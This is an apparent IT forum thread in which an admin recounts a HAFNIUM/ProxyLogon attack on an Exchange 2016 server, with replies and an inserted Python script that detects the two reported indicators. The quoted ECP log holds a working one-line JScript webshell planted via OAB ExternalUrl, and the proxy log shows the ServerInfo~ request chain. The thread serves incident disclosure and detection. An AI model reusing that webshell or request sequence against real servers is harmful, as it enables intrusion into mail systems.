Hi Spiceheads,

As you know, we’re facing HAFNIUM 0-day exploits:
https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/

Even if you installed the patch, your servers can be vulnerable. You can check via script:

As far as I know, if you're compromised, the only solution is to rebuild Exchange and reset all users' passwords.

And now (12.3.), first wave of ransomware began:

Don’t want to repeat all the general stuff, but want to describe our experience. We use Exchange 2016 CU19 (single box, all roles on it), it’s exposed to the internet. We installed KB5000871 on Saturday, 6th of March.

As Microsoft recommends, we ran Test-ProxyLogon.ps1 and found:
[cve-2021-26855] suspicious activity found in http proxy log!
and
[cve-2021-27065] suspicious activity found in ecp logs!

We found 2 incidents, both before KB5000871 had been installed.

In both cases the attack followed the same scenario:

ECPServer20210304-1.log:
2021-03-04T09:38:24.923Z,EXCH2016,ECP.Request,"S:TIME=1629;S:SID=f7f182a9-e307-450a-a6aa-90c7a5c0f5c3;'S:CMD=Set-OabVirtualDirectory.ExternalUrl=''http://f/<script language=""JScript"" runat=""server"">function Page_Load(){eval(Request[""gttkomomo""],""unsafe"");}''.Identity=''4e271dc0-9efc-400b-8e3d-bbaa53b3192c''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=VsLBflD3nUKwLG0ebfYyJFl5TIiD4NgIZq732MG4v0gumpYSpPqcwY10thXmHbSUUkWRXXga4Gc.&schema=OABVirtualDirectory;S:REFERRER=;S:EX=;S:ACTID=625aae9c-dc7f-4acc-9a63-8e27956b17d7;S:RS=0;S:BLD=15.1.1591.10;S:TNAME=;S:TID=;S:USID=6c29c405-598a-4600-bec9-5417fdb1e331;S:EDOID=;S:ACID="
2021-03-04T09:38:25.002Z,EXCH2016,ECP.Request,S:TIME=78;S:SID=f7f182a9-e307-450a-a6aa-90c7a5c0f5c3;'S:CMD=Get-OabVirtualDirectory.ADPropertiesOnly=$true.Identity=''4e271dc0-9efc-400b-8e3d-bbaa53b3192c''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=VsLBflD3nUKwLG0ebfYyJFl5TIiD4NgIZq732MG4v0gumpYSpPqcwY10thXmHbSUUkWRXXga4Gc.&schema=OABVirtualDirectory;S:REFERRER=;S:EX=;S:ACTID=625aae9c-dc7f-4acc-9a63-8e27956b17d7;S:RS=1;S:BLD=15.1.1591.10;S:TNAME=;S:TID=;S:USID=6c29c405-598a-4600-bec9-5417fdb1e331;S:EDOID=;S:ACID=
2021-03-04T09:38:27.969Z,EXCH2016,ECP.LongRunning,S:TIME=1620;S:SID=f7f182a9-e307-450a-a6aa-90c7a5c0f5c3;'S:CMD=Get-OABVirtualDirectory.Identity=''4e271dc0-9efc-400b-8e3d-bbaa53b3192c''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=VsLBflD3nUKwLG0ebfYyJFl5TIiD4NgIZq732MG4v0gumpYSpPqcwY10thXmHbSUUkWRXXga4Gc.&schema=ResetOABVirtualDirectory;S:REFERRER=;S:EX=;S:ACTID=9c6108e1-151d-46f1-9094-ab55ea2ce95d;S:RS=1;S:BLD=15.1.1591.10;S:TNAME=;S:TID=;S:USID=6c29c405-598a-4600-bec9-5417fdb1e331;S:EDOID=;S:ACID=
2021-03-04T09:38:28.000Z,EXCH2016,ECP.Request,S:TIME=408;S:SID=f7f182a9-e307-450a-a6aa-90c7a5c0f5c3;'S:CMD=Set-OabVirtualDirectory.ExternalUrl=$null.Identity=''4e271dc0-9efc-400b-8e3d-bbaa53b3192c''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=VsLBflD3nUKwLG0ebfYyJFl5TIiD4NgIZq732MG4v0gumpYSpPqcwY10thXmHbSUUkWRXXga4Gc.&schema=OABVirtualDirectory;S:REFERRER=;S:EX=;S:ACTID=cf36e309-3c1d-401b-8a1a-80713f90335b;S:RS=0;S:BLD=15.1.1591.10;S:TNAME=;S:TID=;S:USID=6c29c405-598a-4600-bec9-5417fdb1e331;S:EDOID=;S:ACID=

HTTP Proxy LOG:
DateTime: 2021-03-04T09:37:55.328Z
ClientIpAddress: 103.212.223.210
UrlHost: Your public IP
UrlStem: /ecp/y.js
RoutingHint: X-BEResource-Cookie
UserAgent: python-requests/2.25.1

AnchorMailbox, HttpStatus:
ServerInfo~a]@EXCH2016.domain.local:444/mapi/emsmdb/?# 200
ServerInfo~a]@EXCH2016.domain.local:444/ecp/proxyLogon.ecp?# 241
ServerInfo~a]@EXCH2016.domain.local:444/ecp/DDI/DDIService.svc/GetObject?msExchEcpCanary=VsLBflD3nUKwLG0ebfYyJFl5TIiD4NgIZq732MG4v0gumpYSpPqcwY10thXmHbSUUkWRXXga5Gc.&schema=OABVirtualDirectory# 200
ServerInfo~a]@EXCH2016.domain.local:444/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=VsLBflD3nUKwLG0ebfYyJFl5TIiD4NgIZq732MG4v0gumpYSpPqcwY10thXmHbSUUkWRXXga5Gc.&schema=OABVirtualDirectory# 200
ServerInfo~a]@EXCH2016.domain.local:444/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=VsLBflD3nUKwLG0ebfYyJFl5TIiD4NgIZq732MG4v0gumpYSpPqcwY10thXmHbSUUkWRXXga5Gc.&schema=ResetOABVirtualDirectory# 200

So we tried to find a webshell, but fortunately we found it only in ESET:

To be sure, we ran CompareExchangeHashes.ps1 and MSERT. Clean in both cases.

Microsoft Safety Scanner: [screenshot virus_check_2.png]

So many thanks to ESET guys!!!

I think we were saved by ESET.

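Added example, not part of the original post and not Microsoft's Test-ProxyLogon.ps1: a Python sketch of the two indicators the script reported above, run over constructed sample lines (the ECP server log in its Timestamp,Server,Event,EventData layout; the HTTP proxy log reduced to an assumed six-column layout matching the fields quoted above, with RFC 5737 addresses). It flags a ServerInfo~ anchor mailbox (CVE-2021-26855) and a Set-*VirtualDirectory write whose URL carries server-side script (CVE-2021-27065), then pairs each write with the proxy requests seen in the preceding five minutes, the 09:37:55 / 09:38:24 sequence shown above.

```python
import csv
import io
import re
from datetime import datetime, timedelta
# Constructed sample lines modelled on the excerpts above (not real log data).
# ECP server log: Timestamp,Server,Event,EventData
ECP_LOG = """\
2021-03-04T09:38:24.923Z,EXCH2016,ECP.Request,S:TIME=1629;S:CMD=Set-OabVirtualDirectory.ExternalUrl='http://f/<script runat="server">CONSTRUCTED</script>'.Identity='4e27';S:URL=/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory
2021-03-04T09:38:28.000Z,EXCH2016,ECP.Request,S:TIME=408;S:CMD=Set-OabVirtualDirectory.ExternalUrl=$null.Identity='4e27';S:URL=/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory
2021-03-05T10:00:00.000Z,EXCH2016,ECP.Request,S:TIME=50;S:CMD=Get-Mailbox.Identity='alice';S:URL=/ecp/DDI/DDIService.svc/GetObject?schema=Mailbox
"""
# HTTP proxy log, reduced to the columns quoted above (assumed layout, constructed rows).
PROXY_LOG = """\
DateTime,ClientIpAddress,UrlStem,UserAgent,AnchorMailbox,HttpStatus
2021-03-04T09:37:55.328Z,203.0.113.7,/ecp/y.js,python-requests/2.25.1,ServerInfo~a]@exch.example.local:444/ecp/proxyLogon.ecp?#,241
2021-03-04T09:37:56.100Z,203.0.113.7,/ecp/y.js,python-requests/2.25.1,ServerInfo~a]@exch.example.local:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory#,200
2021-03-04T11:02:10.000Z,198.51.100.5,/owa/,Mozilla/5.0,alice@example.local,200
"""
# CVE-2021-27065 indicator: a Set-*VirtualDirectory command whose URL value carries server-side script.
ECP_RE = re.compile(r"Set-\w+VirtualDirectory\.(?:External|Internal)Url=.*?<(?:script|%)", re.I)
# CVE-2021-26855 indicator: an AnchorMailbox that begins with "ServerInfo~".
PROXY_RE = re.compile(r"^ServerInfo~", re.I)

def parse_ts(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%fZ")

def find_ecp_hits(text):
    """Return (timestamp, command) for ECP entries matching the webshell-write pattern."""
    hits = []
    for line in text.splitlines():
        ts, _server, _event, data = line.split(",", 3)
        if ECP_RE.search(data):
            hits.append((parse_ts(ts), data.split("S:CMD=", 1)[1].split(";", 1)[0]))
    return hits

def find_proxy_hits(text):
    """Return (timestamp, client_ip, anchor) for proxy entries with a ServerInfo~ anchor mailbox."""
    rows = csv.DictReader(io.StringIO(text))
    return [(parse_ts(r["DateTime"]), r["ClientIpAddress"], r["AnchorMailbox"])
            for r in rows if PROXY_RE.search(r["AnchorMailbox"])]

def correlate(ecp_hits, proxy_hits, window=timedelta(minutes=5)):
    """Pair each config write with the source IPs of ServerInfo~ requests in the preceding window."""
    chains = []
    for ecp_ts, cmd in ecp_hits:
        ips = sorted({ip for p_ts, ip, _ in proxy_hits if ecp_ts - window <= p_ts <= ecp_ts})
        chains.append({"when": ecp_ts.isoformat(), "command": cmd, "preceding_ips": ips})
    return chains
```

Calling correlate(find_ecp_hits(ECP_LOG), find_proxy_hits(PROXY_LOG)) yields one chain: the 09:38:24 write preceded by requests from 203.0.113.7; the later $null reset and the Get-Mailbox entry are not flagged.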

Thanks for sharing!

Ugh, I can almost feel the blood draining out of my body if that was my server. Thankfully we came back clean on all fronts. I was following along on Reddit as well with some of the horror stories there. In one thread I read, the engineer was only given a maintenance window 3 weeks out by the head of IT. Good luck with that.

What did you do post-remediation? Did users change PWs or anything like that as a precaution?